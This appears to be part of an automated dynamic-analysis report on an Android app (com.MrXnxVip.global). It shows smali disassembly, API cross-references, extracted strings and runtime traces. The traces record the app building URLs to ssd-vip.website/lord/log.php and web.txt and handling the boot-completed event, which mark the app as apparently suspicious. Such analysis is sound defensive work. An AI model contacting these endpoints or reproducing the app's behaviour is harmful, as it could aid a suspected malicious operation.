                        204invoke-direct {v1, p1, v4, v5, v2}, Lokhttp3/internal/http/RealResponseBody;-><init>(Ljava/lang/String;JLokio/BufferedSource;)V
                        205check-cast v1, Lokhttp3/ResponseBody;
                        207invoke-virtual {v0, v1}, Lokhttp3/Response$Builder;->body(Lokhttp3/ResponseBody;)Lokhttp3/Response$Builder;
                        208cond_114:
                        209invoke-virtual {v0}, Lokhttp3/Response$Builder;->build()Lokhttp3/Response;
                        210move-result-object p1
                        211return-object p1
                        Cross References
                        APIs
                        • java.lang.Object.toString
                        • java.lang.CharSequence.length
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.ProtocolException.<init>
                        • java.lang.NullPointerException.<init>
                        • java.lang.NumberFormatException.getMessage
                        • java.net.ProtocolException.<init>
                        Strings
                        • ;
                        • expected chunk size and optional extensions
                        • but was \"
                        • null cannot be cast to non-null type kotlin.CharSequence
                        Position Instruction Meta Information
                        0iget-wide v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        1const-wide/16 v2, -0x1
                        2cmp-long v4, v0, v2
                        3if-eqz v4, :cond_11
                        5iget-object v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->this$0:Lokhttp3/internal/http1/Http1ExchangeCodec;
                        7invoke-static {v0}, Lokhttp3/internal/http1/Http1ExchangeCodec;->access$getSource$p(Lokhttp3/internal/http1/Http1ExchangeCodec;)Lokio/BufferedSource;
                        8move-result-object v0
                        10invoke-interface {v0}, Lokio/BufferedSource;->readUtf8LineStrict()Ljava/lang/String;
                        11cond_11:
                        12iget-object v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->this$0:Lokhttp3/internal/http1/Http1ExchangeCodec;
                        14invoke-static {v0}, Lokhttp3/internal/http1/Http1ExchangeCodec;->access$getSource$p(Lokhttp3/internal/http1/Http1ExchangeCodec;)Lokio/BufferedSource;
                        15move-result-object v0
                        17invoke-interface {v0}, Lokio/BufferedSource;->readHexadecimalUnsignedLong()J
                        18move-result-wide v0
                        19iput-wide v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        21iget-object v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->this$0:Lokhttp3/internal/http1/Http1ExchangeCodec;
                        23invoke-static {v0}, Lokhttp3/internal/http1/Http1ExchangeCodec;->access$getSource$p(Lokhttp3/internal/http1/Http1ExchangeCodec;)Lokio/BufferedSource;
                        24move-result-object v0
                        26invoke-interface {v0}, Lokio/BufferedSource;->readUtf8LineStrict()Ljava/lang/String;
                        27move-result-object v0
                        28if-eqz v0, :cond_b0
                        29check-cast v0, Ljava/lang/CharSequence;
                        31invoke-static {v0}, Lkotlin/text/StringsKt;->trim(Ljava/lang/CharSequence;)Ljava/lang/CharSequence;
                        32move-result-object v0
                        34invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        35move-result-object v0
                        36iget-wide v1, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        37const-wide/16 v3, 0x0
                        38cmp-long v5, v1, v3
                        39if-ltz v5, :cond_88
                        40move-object v1, v0
                        41check-cast v1, Ljava/lang/CharSequence;
                        43invoke-interface {v1}, Ljava/lang/CharSequence;->length()I
                        44move-result v1
                        45const/4 v2, 0x0
                        46if-lez v1, :cond_47
                        47const/4 v1, 0x1
                        48goto/16 :goto_48
                        49cond_47: const/4 v1, 0x0
                        50goto_48: if-eqz v1, :cond_54
                        52const-string v1, ";"
                        53const/4 v5, 0x2
                        54const/4 v6, 0x0
                        56invoke-static {v0, v1, v2, v5, v6}, Lkotlin/text/StringsKt;->startsWith$default(Ljava/lang/String;Ljava/lang/String;ZILjava/lang/Object;)Z
                        57move-result v1
                        58try_end_52: if-eqz v1, :cond_88
                        59cond_54: iget-wide v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        60cmp-long v5, v0, v3
                        61if-nez v5, :cond_87
                        62iput-boolean v2, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->hasMoreChunks:Z
                        64iget-object v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->this$0:Lokhttp3/internal/http1/Http1ExchangeCodec;
                        66invoke-static {v0}, Lokhttp3/internal/http1/Http1ExchangeCodec;->access$getHeadersReader$p(Lokhttp3/internal/http1/Http1ExchangeCodec;)Lokhttp3/internal/http1/HeadersReader;
                        67move-result-object v1
                        69invoke-virtual {v1}, Lokhttp3/internal/http1/HeadersReader;->readHeaders()Lokhttp3/Headers;
                        70move-result-object v1
                        72invoke-static {v0, v1}, Lokhttp3/internal/http1/Http1ExchangeCodec;->access$setTrailers$p(Lokhttp3/internal/http1/Http1ExchangeCodec;Lokhttp3/Headers;)V
                        74iget-object v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->this$0:Lokhttp3/internal/http1/Http1ExchangeCodec;
                        76invoke-static {v0}, Lokhttp3/internal/http1/Http1ExchangeCodec;->access$getClient$p(Lokhttp3/internal/http1/Http1ExchangeCodec;)Lokhttp3/OkHttpClient;
                        77move-result-object v0
                        79invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        81invoke-virtual {v0}, Lokhttp3/OkHttpClient;->cookieJar()Lokhttp3/CookieJar;
                        82move-result-object v0
                        84iget-object v1, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->url:Lokhttp3/HttpUrl;
                        86iget-object v2, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->this$0:Lokhttp3/internal/http1/Http1ExchangeCodec;
                        88invoke-static {v2}, Lokhttp3/internal/http1/Http1ExchangeCodec;->access$getTrailers$p(Lokhttp3/internal/http1/Http1ExchangeCodec;)Lokhttp3/Headers;
                        89move-result-object v2
                        91invoke-static {v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        93invoke-static {v0, v1, v2}, Lokhttp3/internal/http/HttpHeaders;->receiveHeaders(Lokhttp3/CookieJar;Lokhttp3/HttpUrl;Lokhttp3/Headers;)V
                        95invoke-virtual {p0}, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->responseBodyComplete()V
                        96cond_87: return-void
                        97cond_88: new-instance v1, Ljava/net/ProtocolException;
                        98new-instance v2, Ljava/lang/StringBuilder;
                        100invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        102const-string v3, "expected chunk size and optional extensions"
                        104invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        106const-string v3, " but was \""
                        108invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        109iget-wide v3, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        111invoke-virtual {v2, v3, v4}, Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
                        113invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        114const/16 v0, 0x22
                        116invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        118invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        119move-result-object v0
                        121invoke-direct {v1, v0}, Ljava/net/ProtocolException;-><init>(Ljava/lang/String;)V
                        122check-cast v1, Ljava/lang/Throwable;
                        123throw v1
                        124cond_b0: new-instance v0, Ljava/lang/NullPointerException;
                        126const-string v1, "null cannot be cast to non-null type kotlin.CharSequence"
                        128invoke-direct {v0, v1}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        129throw v0
                        130catch_b8: move-exception v0
                        131new-instance v1, Ljava/net/ProtocolException;
                        133invoke-virtual {v0}, Ljava/lang/NumberFormatException;->getMessage()Ljava/lang/String;
                        134move-result-object v0
                        136invoke-direct {v1, v0}, Ljava/net/ProtocolException;-><init>(Ljava/lang/String;)V
                        137check-cast v1, Ljava/lang/Throwable;
                        138throw v1
                        Cross References
                        APIs
                        • android.content.Intent.getAction
                        • java.lang.String.equals
                        • java.lang.Class.getClassLoader
                        • android.content.Intent.setExtrasClassLoader
                        • android.content.Intent.getStringExtra
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • android.content.Intent.getParcelableExtra
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • android.intent.action.BOOT_COMPLETED
                        • b4a_firebasemessaging
                        • event
                        • b4a_tokenrefresh
                        • b4a_messagereceived
                        • message
                        • _messagearrived
                        Position Instruction Meta Information
                        0const/4 v0, 0x0
                        1if-eqz p1, :cond_63
                        3invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
                        • Time: 689628
                          • This:
                            • android.content.Intent@98f2094
                          • Return:
                            • null
                        • Time: 812081
                          • This:
                            • android.content.Intent@91c580f
                          • Return:
                            • android.intent.action.BOOT_COMPLETED
                        4move-result-object v1
                        6const-string v2, "b4a_firebasemessaging"
                        8invoke-virtual {v2, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        9move-result v1
                        10if-nez v1, :cond_10
                        11goto/16 :goto_63
                        12cond_10: const-class v1, Lcom/google/firebase/messaging/RemoteMessage;
                        14invoke-virtual {v1}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader;
                        15move-result-object v1
                        17invoke-virtual {p1, v1}, Landroid/content/Intent;->setExtrasClassLoader(Ljava/lang/ClassLoader;)V
                        19const-string v1, "event"
                        21invoke-virtual {p1, v1}, Landroid/content/Intent;->getStringExtra(Ljava/lang/String;)Ljava/lang/String;
                        22move-result-object v1
                        24const-string v2, "b4a_tokenrefresh"
                        26invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        27move-result v2
                        28const/4 v3, 0x1
                        29if-eqz v2, :cond_2c
                        31invoke-direct {p0}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;->updateToken()V
                        32goto/16 :goto_62
                        33cond_2c:
                        34const-string v2, "b4a_messagereceived"
                        36invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        37move-result v1
                        38if-eqz v1, :cond_62
                        40const-string v1, "message"
                        42invoke-virtual {p1, v1}, Landroid/content/Intent;->getParcelableExtra(Ljava/lang/String;)Landroid/os/Parcelable;
                        43move-result-object p1
                        44check-cast p1, Lcom/google/firebase/messaging/RemoteMessage;
                        46iget-object v1, p0, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;->ba:Lanywheresoftware/b4a/BA;
                        47new-instance v2, Ljava/lang/StringBuilder;
                        49iget-object v4, p0, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;->eventName:Ljava/lang/String;
                        51invoke-static {v4}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        52move-result-object v4
                        54invoke-direct {v2, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        56const-string v4, "_messagearrived"
                        58invoke-virtual {v2, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        60invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        61move-result-object v2
                        62new-array v4, v3, [Ljava/lang/Object;
                        63new-instance v5, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;
                        65invoke-direct {v5}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;-><init>()V
                        67invoke-static {v5, p1}, Lanywheresoftware/b4a/AbsObjectWrapper;->ConvertToWrapper(Lanywheresoftware/b4a/ObjectWrapper;Ljava/lang/Object;)Lanywheresoftware/b4a/ObjectWrapper;
                        68move-result-object p1
                        69aput-object p1, v4, v0
                        71invoke-virtual {v1, p0, v2, v4}, Lanywheresoftware/b4a/BA;->raiseEventFromUI(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)V
                        72goto_62: return v3
                        73goto_63: return v0
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Collection.add
                        • java.util.ArrayList.<init>
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Collection.add
                        • java.lang.IllegalStateException.<init>
                        • java.lang.IllegalStateException.<init>
                        Strings
                        • https://ssd-vip.website/
                        • https://ssd-vip.website/lord/log.php
                        • https://ssd-vip.website/lord/web.txt
                        • host == null
                        • scheme == null
                        Position Instruction Meta Information
                        0move-object/from16 v0, p0
                        2iget-object v2, v0, Lokhttp3/HttpUrl$Builder;->scheme:Ljava/lang/String;
                        3if-eqz v2, :cond_bd
                        5sget-object v3, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        7iget-object v4, v0, Lokhttp3/HttpUrl$Builder;->encodedUsername:Ljava/lang/String;
                        8const/4 v5, 0x0
                        9const/4 v6, 0x0
                        10const/4 v7, 0x0
                        11const/4 v8, 0x7
                        12const/4 v9, 0x0
                        14invoke-static/range {v3 .. v9}, Lokhttp3/HttpUrl$Companion;->percentDecode$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IIZILjava/lang/Object;)Ljava/lang/String;
                        15move-result-object v3
                        17sget-object v4, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        19iget-object v5, v0, Lokhttp3/HttpUrl$Builder;->encodedPassword:Ljava/lang/String;
                        20const/4 v8, 0x0
                        21const/4 v9, 0x7
                        22const/4 v10, 0x0
                        24invoke-static/range {v4 .. v10}, Lokhttp3/HttpUrl$Companion;->percentDecode$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IIZILjava/lang/Object;)Ljava/lang/String;
                        25move-result-object v4
                        27iget-object v5, v0, Lokhttp3/HttpUrl$Builder;->host:Ljava/lang/String;
                        28if-eqz v5, :cond_b3
                        30invoke-direct/range {p0 .. p0}, Lokhttp3/HttpUrl$Builder;->effectivePort()I
                        31move-result v6
                        33iget-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedPathSegments:Ljava/util/List;
                        34check-cast v1, Ljava/lang/Iterable;
                        35new-instance v7, Ljava/util/ArrayList;
                        36const/16 v8, 0xa
                        38invoke-static {v1, v8}, Lkotlin/collections/CollectionsKt;->collectionSizeOrDefault(Ljava/lang/Iterable;I)I
                        39move-result v9
                        41invoke-direct {v7, v9}, Ljava/util/ArrayList;-><init>(I)V
                        42check-cast v7, Ljava/util/Collection;
                        44invoke-interface {v1}, Ljava/lang/Iterable;->iterator()Ljava/util/Iterator;
                        45move-result-object v1
                        46goto_3b:
                        47invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
                        48move-result v9
                        49if-eqz v9, :cond_58
                        51invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        52move-result-object v9
                        53move-object v11, v9
                        54check-cast v11, Ljava/lang/String;
                        56sget-object v10, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        57const/4 v12, 0x0
                        58const/4 v13, 0x0
                        59const/4 v14, 0x0
                        60const/4 v15, 0x7
                        61const/16 v16, 0x0
                        63invoke-static/range {v10 .. v16}, Lokhttp3/HttpUrl$Companion;->percentDecode$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IIZILjava/lang/Object;)Ljava/lang/String;
                        64move-result-object v9
                        66invoke-interface {v7, v9}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        67goto/16 :goto_3b
                        68cond_58: check-cast v7, Ljava/util/List;
                        70iget-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedQueryNamesAndValues:Ljava/util/List;
                        71const/4 v9, 0x0
                        72if-eqz v1, :cond_96
                        73check-cast v1, Ljava/lang/Iterable;
                        74new-instance v10, Ljava/util/ArrayList;
                        76invoke-static {v1, v8}, Lkotlin/collections/CollectionsKt;->collectionSizeOrDefault(Ljava/lang/Iterable;I)I
                        77move-result v8
                        79invoke-direct {v10, v8}, Ljava/util/ArrayList;-><init>(I)V
                        80check-cast v10, Ljava/util/Collection;
                        82invoke-interface {v1}, Ljava/lang/Iterable;->iterator()Ljava/util/Iterator;
                        83move-result-object v1
                        84goto_70:
                        85invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
                        86move-result v8
                        87if-eqz v8, :cond_92
                        89invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        90move-result-object v8
                        91move-object v12, v8
                        92check-cast v12, Ljava/lang/String;
                        93if-eqz v12, :cond_8d
                        95sget-object v11, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        96const/4 v13, 0x0
                        97const/4 v14, 0x0
                        98const/4 v15, 0x1
                        99const/16 v16, 0x3
                        100const/16 v17, 0x0
                        102invoke-static/range {v11 .. v17}, Lokhttp3/HttpUrl$Companion;->percentDecode$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IIZILjava/lang/Object;)Ljava/lang/String;
                        103move-result-object v8
                        104goto/16 :goto_8e
                        105cond_8d: move-object v8, v9
                        106goto_8e:
                        107invoke-interface {v10, v8}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        108goto/16 :goto_70
                        109cond_92: check-cast v10, Ljava/util/List;
                        110move-object v8, v10
                        111goto/16 :goto_97
                        112cond_96: move-object v8, v9
                        113goto_97:
                        114iget-object v11, v0, Lokhttp3/HttpUrl$Builder;->encodedFragment:Ljava/lang/String;
                        115if-eqz v11, :cond_a8
                        117sget-object v10, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        118const/4 v12, 0x0
                        119const/4 v13, 0x0
                        120const/4 v14, 0x0
                        121const/4 v15, 0x7
                        122const/16 v16, 0x0
                        124invoke-static/range {v10 .. v16}, Lokhttp3/HttpUrl$Companion;->percentDecode$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IIZILjava/lang/Object;)Ljava/lang/String;
                        125move-result-object v1
                        126move-object v9, v1
                        127cond_a8:
                        128invoke-virtual/range {p0 .. p0}, Lokhttp3/HttpUrl$Builder;->toString()Ljava/lang/String;
                        • Time: 690660
                          • This:
                            • https://ssd-vip.website/lord/log.php
                          • Return:
                            • https://ssd-vip.website/lord/log.php
                        • Time: 695410
                          • This:
                            • https://ssd-vip.website/lord/web.txt
                          • Return:
                            • https://ssd-vip.website/lord/web.txt
                        • Time: 697354
                          • This:
                            • https://ssd-vip.website/
                          • Return:
                            • https://ssd-vip.website/
                        129move-result-object v10
                        130new-instance v11, Lokhttp3/HttpUrl;
                        131move-object v1, v11
                        133invoke-direct/range {v1 .. v10}, Lokhttp3/HttpUrl;-><init>(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;ILjava/util/List;Ljava/util/List;Ljava/lang/String;Ljava/lang/String;)V
                        134return-object v11
                        135cond_b3: new-instance v1, Ljava/lang/IllegalStateException;
                        137const-string v2, "host == null"
                        139invoke-direct {v1, v2}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        140check-cast v1, Ljava/lang/Throwable;
                        141throw v1
                        142cond_bd: new-instance v1, Ljava/lang/IllegalStateException;
                        144const-string v2, "scheme == null"
                        146invoke-direct {v1, v2}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        147check-cast v1, Ljava/lang/Throwable;
                        148goto/16 :goto_c8
                        149goto_c7: throw v1
                        150goto_c8: goto/16 :goto_c7
                        APIs
                        • android.app.Activity.onPause
                        • com.MrXnxVip.global.main._activity:Lanywheresoftware/b4a/objects/ActivityWrapper
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • android.app.Activity.isFinishing
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main._activity:Lanywheresoftware/b4a/objects/ActivityWrapper
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • android.app.Activity.isFinishing
                        • java.lang.Boolean.valueOf
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • android.app.Activity.isFinishing
                        • java.lang.ref.WeakReference.<init>
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • ** Activity (main) Pause, UserClosed =
                        • **
                        • ** Activity (main) Pause, UserClosed = false **
                        • ** Activity (main) Pause event (activity is not paused). **
                        • activity_pause
                        • onpause
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/app/Activity;->onPause()V
                        3iget-object v0, p0, Lcom/MrXnxVip/global/main;->_activity:Lanywheresoftware/b4a/objects/ActivityWrapper;
                        4if-nez v0, :cond_8
                        5return-void
                        6cond_8:
                        7sget-object v0, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        8if-eq p0, v0, :cond_d
                        9return-void
                        10cond_d: const/4 v0, 0x1
                        12invoke-static {v0}, Lanywheresoftware/b4a/Msgbox;->dismiss(Z)V
                        13sget-boolean v1, Lcom/MrXnxVip/global/main;->dontPause:Z
                        14if-nez v1, :cond_37
                        15new-instance v1, Ljava/lang/StringBuilder;
                        17invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        19const-string v2, "** Activity (main) Pause, UserClosed = "
                        21invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        23iget-object v2, p0, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        25iget-object v2, v2, Lanywheresoftware/b4a/BA;->activity:Landroid/app/Activity;
                        27invoke-virtual {v2}, Landroid/app/Activity;->isFinishing()Z
                        28move-result v2
                        30invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        32const-string v2, " **"
                        34invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        36invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        37move-result-object v1
                        39invoke-static {v1}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 696251
                          • p0: ** Activity (main) Pause, UserClosed = false **
                        40goto/16 :goto_3c
                        41cond_37:
                        42const-string v1, "** Activity (main) Pause event (activity is not paused). **"
                        44invoke-static {v1}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        45goto_3c:
                        46sget-object v1, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        47const/4 v2, 0x0
                        48if-eqz v1, :cond_5c
                        50sget-object v3, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        52iget-object v4, p0, Lcom/MrXnxVip/global/main;->_activity:Lanywheresoftware/b4a/objects/ActivityWrapper;
                        53const/4 v5, 0x1
                        54const/4 v7, 0x0
                        55new-array v8, v0, [Ljava/lang/Object;
                        57iget-object v1, p0, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        59iget-object v1, v1, Lanywheresoftware/b4a/BA;->activity:Landroid/app/Activity;
                        61invoke-virtual {v1}, Landroid/app/Activity;->isFinishing()Z
                        62move-result v1
                        64invoke-static {v1}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        65move-result-object v1
                        66aput-object v1, v8, v2
                        68const-string v6, "activity_pause"
                        70invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        71cond_5c: sget-boolean v1, Lcom/MrXnxVip/global/main;->dontPause:Z
                        72const/4 v3, 0x0
                        73if-nez v1, :cond_68
                        75sget-object v1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        77invoke-virtual {v1, v0}, Lanywheresoftware/b4a/BA;->setActivityPaused(Z)V
                        78sput-object v3, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        79cond_68:
                        80iget-object v0, p0, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        82iget-object v0, v0, Lanywheresoftware/b4a/BA;->activity:Landroid/app/Activity;
                        84invoke-virtual {v0}, Landroid/app/Activity;->isFinishing()Z
                        85move-result v0
                        86if-nez v0, :cond_79
                        87new-instance v0, Ljava/lang/ref/WeakReference;
                        89invoke-direct {v0, p0}, Ljava/lang/ref/WeakReference;-><init>(Ljava/lang/Object;)V
                        90sput-object v0, Lcom/MrXnxVip/global/main;->previousOne:Ljava/lang/ref/WeakReference;
                        91cond_79: sput-boolean v2, Lanywheresoftware/b4a/Msgbox;->isDismissing:Z
                        93sget-object v0, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        95const-string v1, "onpause"
                        97invoke-virtual {v0, v1, p0, v3}, Lanywheresoftware/b4a/BA;->runHook(Ljava/lang/String;Ljava/lang/Object;[Ljava/lang/Object;)Z
                        98return-void
                        APIs
                        • android.app.Activity.onCreate
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.getApplicationContext
                        • java.lang.Object.getClass
                        • com.MrXnxVip.global.main.getApplicationContext
                        • android.content.Context.getResources
                        • android.content.res.Resources.getDisplayMetrics
                        • anywheresoftware.b4a.BALayout.setDeviceScale
                        • com.MrXnxVip.global.main.previousOne:Ljava/lang/ref/WeakReference
                        • java.lang.ref.WeakReference.get
                        • android.app.Activity.finish
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.getWindow
                        • android.view.Window.requestFeature
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • anywheresoftware.b4a.BALayout.<init>
                        • com.MrXnxVip.global.main.setContentView
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • android.os.Handler.postDelayed
                        Strings
                        • com.MrXnxVip.global
                        • com.MrXnxVip.global.main
                        • Killing previous instance (main).
                        • oncreate
                        Position Instruction Meta Information
                        1invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
                        2sput-object p0, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        4sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        5if-nez p1, :cond_34
                        6new-instance p1, Lanywheresoftware/b4a/BA;
                        8invoke-virtual {p0}, Lcom/MrXnxVip/global/main;->getApplicationContext()Landroid/content/Context;
                        • Time: 685635
                          • This:
                            • com.MrXnxVip.global.main@ff69451
                          • Return:
                            • android.app.Application@feb8753
                        9move-result-object v1
                        10const/4 v2, 0x0
                        11const/4 v3, 0x0
                        13const-string v4, "com.MrXnxVip.global"
                        15const-string v5, "com.MrXnxVip.global.main"
                        16move-object v0, p1
                        18invoke-direct/range {v0 .. v5}, Lanywheresoftware/b4a/BA;-><init>(Landroid/content/Context;Lanywheresoftware/b4a/BALayout;Lanywheresoftware/b4a/BA;Ljava/lang/String;Ljava/lang/String;)V
                        19sput-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        21invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 685656
                          • This:
                            • com.MrXnxVip.global.main@ff69451
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        22move-result-object v0
                        24invoke-virtual {p1, v0}, Lanywheresoftware/b4a/BA;->loadHtSubs(Ljava/lang/Class;)V
                        26invoke-virtual {p0}, Lcom/MrXnxVip/global/main;->getApplicationContext()Landroid/content/Context;
                        • Time: 685662
                          • This:
                            • com.MrXnxVip.global.main@ff69451
                          • Return:
                            • android.app.Application@feb8753
                        27move-result-object p1
                        29invoke-virtual {p1}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
                        30move-result-object p1
                        32invoke-virtual {p1}, Landroid/content/res/Resources;->getDisplayMetrics()Landroid/util/DisplayMetrics;
                        33move-result-object p1
                        34iget p1, p1, Landroid/util/DisplayMetrics;->density:F
                        36invoke-static {p1}, Lanywheresoftware/b4a/BALayout;->setDeviceScale(F)V
                        37goto/16 :goto_4a
                        38cond_34:
